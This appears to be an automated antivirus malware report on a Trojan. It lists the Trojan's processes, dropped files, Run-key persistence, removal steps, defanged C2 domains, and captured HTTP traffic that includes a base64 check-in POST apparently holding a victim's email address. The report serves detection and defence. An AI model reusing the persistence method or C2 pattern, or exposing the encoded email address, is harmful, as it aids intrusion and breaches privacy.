Gen.Variant.Kazy.604861_000a8fff3d

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:344
qfjlkyhjspng.exe:4348
ewrrwkxzfemuscomjih.exe:2564
edxqdqrjinn.exe:3580
edxqdqrjinn.exe:5332

The Trojan injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:

ShimCacheMutex

File activity

The process %original file name%.exe:344 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)

The process qfjlkyhjspng.exe:4348 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)

The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)

The process edxqdqrjinn.exe:3580 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
C:\hgsywldzj\qnglq0unrq (84 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)

The process edxqdqrjinn.exe:5332 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)

Registry activity

The process %original file name%.exe:344 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 33 C3 FC F0 18 9E 4B 26 B1 8D 41 D4 D2 26 8D"

The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE A2 A6 D5 FE B6 E5 FA 9F F6 DB 69 C5 B8 34 1D"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe"

The process edxqdqrjinn.exe:3580 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 15 81 A8 A9 CA 88 35 6F 21 06 0F A0 CF 22 08"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):

   %original file name%.exe:344
   qfjlkyhjspng.exe:4348
   ewrrwkxzfemuscomjih.exe:2564
   edxqdqrjinn.exe:3580
   edxqdqrjinn.exe:5332

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:

   %WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
   C:\hgsywldzj\icmjbyxsy1 (12 bytes)
   C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)
   C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)
   C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
   C:\hgsywldzj\qnglq0unrq (84 bytes)
   

4. Delete the following value(s) in the autorun key (How to Work with System Registry):

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	197786	198144	4.59472	d3db33cbe1e67b5fc50d77d3ab9d3dd0
.rdata	204800	51540	51712	4.29268	e689de08fdfceeb94d7941142e8ddfbc
.data	258048	18780	7168	2.96275	b56ddf3be60a92d054c9f7de7e054bb4
.reloc	278528	14112	14336	4.68663	b05f0be3485a2f936c5109f90eeec610

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://machineanimal.net/index.php	72.52.4.91
hxxp://machineproblem.net/index.php	184.168.221.34
hxxp://figureproblem.net/index.php	98.139.135.198

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /index.php HTTP/1.0

Accept: */*

Connection: close

Host: machineproblem.net

HTTP/1.1 302 Found

Connection: close

Pragma: no-cache

cache-control: no-cache

Location: /index.php

POST /index.php HTTP/1.0

Accept: */*

Connection: close

Host: figureproblem.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 197

post=aG9jaHJlaW5qQGNpdGlmaW5hbmNpYWwuY29tCWhnc3l3bGR6agllZHhxZHFyamlubi5leGUJcWZqbGt5aGpzcG5nLmV4ZQlUcmFwIENyZWRlbnRpYWwgRmlsdGVyaW5nIEt0bVJtCVBhbmVsIFJlcG9ydHMgVGFibGV0IFRyYW5zYWN0aW9uCTAwNQ==

HTTP/1.0 200 OK

Date: Fri, 26 Jun 2015 15:08:45 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: ATS/5.0.1

..O.:.......7.'....."...J......X.....TiL.....t....f...==dgv.._e..O.....U..L l<%"O{.|%rs......v....B`.(.:V,c......._0.;.......Q(0.,BV...T..7. FF......AI.%..`....l...D.......$".......v1mG.F_Za...........L.?..E....Jx...z.G.A.....dt......c.......6.0..O"hI&..2%-../z..N..s.}........Z.P.....Z.C..0.[...... 2-..C...q`..S)...$....L~..tM...0..Q...O.q$J.7~.p.:qF5_..b...E...o..n...p....h.L...E.._...j={.... ......Y-V.K..:....}i..._.Yh.....)qq,..H....^....P.F..:%....''(0{.h,7.o..TV.H....?.d..o6...y.Y....V.n_>z.jy.]=..Gq...r...G.*..)Gp2.,.I.'o.....$....k.Ywb.J..1O...W..`...8......O.W....}........T...........T.......(j.....t..r3i....A.{..U.>.j......,[.....L._<x...m..e.....[.....=.8......f A..Rw.h.x...."...-.p')C._.......<.mJ..o...VO..-........7.?..U8......AQ.I....7. ...,..".|:.hJ.I.p.F..|WC!Z...9..]..k'..\M>..%..Qc.]..vM....7'c;.f.....RG.3.y.Cd8O.7.7w.^...Nl..31..{...RC...Ia...'.Y..lC.g.....T..^SI..} .......")%.Y...."..M.\...L......I.GE=.....;...x..E..._.g.C2._.UBH..._a$.{.....|...|.:.ll.iL.1.N}...Hd.2.x..8..,w.u..U6.NWZO..<V.5...-x.h...>...I.f...MB..p.<.P3..3X...oZ)...H..z.......6.#./..wI.p|..../.{......zOSJ..%.>!..cfY.....(...5FF.l...-..O.Q.z.e2.7...o....#. ..2cW8 .(.........,.Y.v.Q......FH.z...|..O...~.....o.../.._.R..V.......0.Y.qr.W.Q.%oJw.I...4...........E.<.... ..

<<< skipped >>>

GET /index.php HTTP/1.0

Accept: */*

Connection: close

Host: figureproblem.net

HTTP/1.0 200 OK

Date: Fri, 26 Jun 2015 15:08:44 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: ATS/5.0.1

..O.:.......7.'....."...J......X.....TiL.....t....f...==dgv.._e..O.....U..L l<%"O{.|%rs......v....B`.(.:V,c......._0.;.......Q(0.,BV...T..7. FF......AI.%..`....l...D.......$".......v1mG.F_Za...........L.?..E....Jx...z.G.A.....dt......c.......6.0..O"hI&..2%-../z..N..s.}........Z.P.....Z.C..0.[...... 2-..C...q`..S)...$....L~..tM...0..Q...O.q$J.7~.p.:qF5_..b...E...o..n...p....h.L...E.._...j={.... ......Y-V.K..:....}i..._.Yh.....)qq,..H....^....P.F..:%....''(0{.h,7.o..TV.H....?.d..o6...y.Y....V.n_>z.jy.]=..Gq...r...G.*..)Gp2.,.I.'o.....$....k.Ywb.J..1O...W..`...8......O.W....}........T...........T.......(j.....t..r3i....A.{..U.>.j......,[.....L._<x...m..e.....[.....=.8......f A..Rw.h.x...."...-.p')C._.......<.mJ..o...VO..-........7.?..U8......AQ.I....7. ...,..".|:.hJ.I.p.F..|WC!Z...9..]..k'..\M>..%..Qc.]..vM....7'c;.f.....RG.3.y.Cd8O.7.7w.^...Nl..31..{...RC...Ia...'.Y..lC.g.....T..^SI..} .......")%.Y...."..M.\...L......I.GE=.....;...x..E..._.g.C2._.UBH..._a$.{.....|...|.:.ll.iL.1.N}...Hd.2.x..8..,w.u..U6.NWZO..<V.5...-x.h...>...I.f...MB..p.<.P3..3X...oZ)...H..z.......6.#./..wI.p|..../.{......zOSJ..%.>!..cfY.....(...5FF.l...-..O.Q.z.e2.7...o....#. ..2cW8 .(.........,.Y.v.Q......FH.z...|..O...~.....o.../.._.R..V.......0.Y.qr.W.Q.%oJw.I...4...........E.<.... ....D...g.......i....

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_344:

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

32.df

32.df

?w/

?w/

zumwoest dgcipdb eupeipzim zsfa bigufomjbi gfya ouu vdzufmce cboorovu ljcaaeuq umo gubolioq vexpitlhis mndecc oiievcec jdoq bfva bmvevtu rnfedaf grgine lnfophti slvocpvu celuli labmaolgne tichuhu acuzu jcnuszm wcej cxloa zau eodgniekb vtboufsy vwjifug uvidv jjdulp epagyo apbef dnbaps efnpep nbxofj dryuf hnluwleb nasrodj msgiiff uirafdisfe rld dzsoyosbui bnociotd jujaqiszlo faenc aozfji wbifebnnu efejsizsfi mnvaze abc sbcil hlel ymgouda hlsepe beye sb

zumwoest dgcipdb eupeipzim zsfa bigufomjbi gfya ouu vdzufmce cboorovu ljcaaeuq umo gubolioq vexpitlhis mndecc oiievcec jdoq bfva bmvevtu rnfedaf grgine lnfophti slvocpvu celuli labmaolgne tichuhu acuzu jcnuszm wcej cxloa zau eodgniekb vtboufsy vwjifug uvidv jjdulp epagyo apbef dnbaps efnpep nbxofj dryuf hnluwleb nasrodj msgiiff uirafdisfe rld dzsoyosbui bnociotd jujaqiszlo faenc aozfji wbifebnnu efejsizsfi mnvaze abc sbcil hlel ymgouda hlsepe beye sb

*upjgaz hpcecvt pja dbsed ucrzescw oilnni gjbocb fibmeneny molc irhnuo gecom gxkinbce lfboofgg jtnoqqiyuf wxlammgax llamazady rlboaorgna zfuta cbsevnsowa unvsop bemtacm rrduep inwidef vas sdne bnpaepc pti ljgofaijco gnpuimc vridonvv sctaibgtip suqlirudpi dlsoq ssovafmpue ewmeau mojkixunli clzoifqne jvevetiz xrmamjj vadsupjlaa ooeljg oardkuf megfikjs pacvubre fbfofoys rgead egbful nmtampv gtbalpiso zvgifgdoea iuwjnarjbi gjago gtbujwfe palb pjn sljanao odsmawrkem frvad gjpilnk fuoj eevaj jnvozffoi imipg gsrio bfdunuver eemmsa modsoclcu mgdatfyiei ssgeplvi mpwi dzazuna epfleybru nsd juwhoyajou llzaf nhlaocfgo ammbemlg egl

*upjgaz hpcecvt pja dbsed ucrzescw oilnni gjbocb fibmeneny molc irhnuo gecom gxkinbce lfboofgg jtnoqqiyuf wxlammgax llamazady rlboaorgna zfuta cbsevnsowa unvsop bemtacm rrduep inwidef vas sdne bnpaepc pti ljgofaijco gnpuimc vridonvv sctaibgtip suqlirudpi dlsoq ssovafmpue ewmeau mojkixunli clzoifqne jvevetiz xrmamjj vadsupjlaa ooeljg oardkuf megfikjs pacvubre fbfofoys rgead egbful nmtampv gtbalpiso zvgifgdoea iuwjnarjbi gjago gtbujwfe palb pjn sljanao odsmawrkem frvad gjpilnk fuoj eevaj jnvozffoi imipg gsrio bfdunuver eemmsa modsoclcu mgdatfyiei ssgeplvi mpwi dzazuna epfleybru nsd juwhoyajou llzaf nhlaocfgo ammbemlg egl

uabod dzra epogei gnlo fngus ocs kbkucklog rzvohlli agxvomcfik osjz lcdode hnba xcz eqfsojuie zlpejdn fvsisortul teu wgleb llfigbtuel gfexezf aalicfii dsavulrqa rdna bbu xfitic cgjit ttahecibe jxqil mgjesrda xda asjionolr oyowlu ogpz bel jgjopspiu gbwinr ffg bllincdugi kzxe aklmelzoci ffhulzixob oofipga pszug rcr pojfuhmm agx fvc lntug srgaovlgec yvtukjjae ofd ucpeabe lhsi lrye bujponxqe hevulew cpdel zhdunmcuup upb iazdmahtul ukscukg rtcuzp byju lbgaad igglu sohdo aisjme relleigw fobpa pliciengl lmgebof eedencelo moxvivjj mddag aekoy uec faef sqzelwdu dasiyodi mimo oodeaib jmjudd znhuaa ifjw npeaoboc hpr utu rjtan qrkastm nfjifm accbutrzo

uabod dzra epogei gnlo fngus ocs kbkucklog rzvohlli agxvomcfik osjz lcdode hnba xcz eqfsojuie zlpejdn fvsisortul teu wgleb llfigbtuel gfexezf aalicfii dsavulrqa rdna bbu xfitic cgjit ttahecibe jxqil mgjesrda xda asjionolr oyowlu ogpz bel jgjopspiu gbwinr ffg bllincdugi kzxe aklmelzoci ffhulzixob oofipga pszug rcr pojfuhmm agx fvc lntug srgaovlgec yvtukjjae ofd ucpeabe lhsi lrye bujponxqe hevulew cpdel zhdunmcuup upb iazdmahtul ukscukg rtcuzp byju lbgaad igglu sohdo aisjme relleigw fobpa pliciengl lmgebof eedencelo moxvivjj mddag aekoy uec faef sqzelwdu dasiyodi mimo oodeaib jmjudd znhuaa ifjw npeaoboc hpr utu rjtan qrkastm nfjifm accbutrzo

B%Q@e.Uv

B%Q@e.Uv

function not supported

function not supported

operation canceled

operation canceled

address_family_not_supported

address_family_not_supported

operation_in_progress

operation_in_progress

operation_not_supported

operation_not_supported

protocol_not_supported

protocol_not_supported

operation_would_block

operation_would_block

address family not supported

address family not supported

broken pipe

broken pipe

inappropriate io control operation

inappropriate io control operation

not supported

not supported

operation in progress

operation in progress

operation not permitted

operation not permitted

operation not supported

operation not supported

operation would block

operation would block

protocol not supported

protocol not supported

GetProcessWindowStation

GetProcessWindowStation

operator

operator

GDI32.dll

GDI32.dll

GetKeyboardType

GetKeyboardType

USER32.dll

USER32.dll

GetCPInfo

GetCPInfo

GetProcessHeap

GetProcessHeap

PeekNamedPipe

PeekNamedPipe

KERNEL32.dll

KERNEL32.dll

zcÁ

zcÁ

%Documents and Settings%\%current user%

%Documents and Settings%\%current user%

C:\hgsywldzj\

C:\hgsywldzj\

c:\%original file name%.exe

c:\%original file name%.exe

0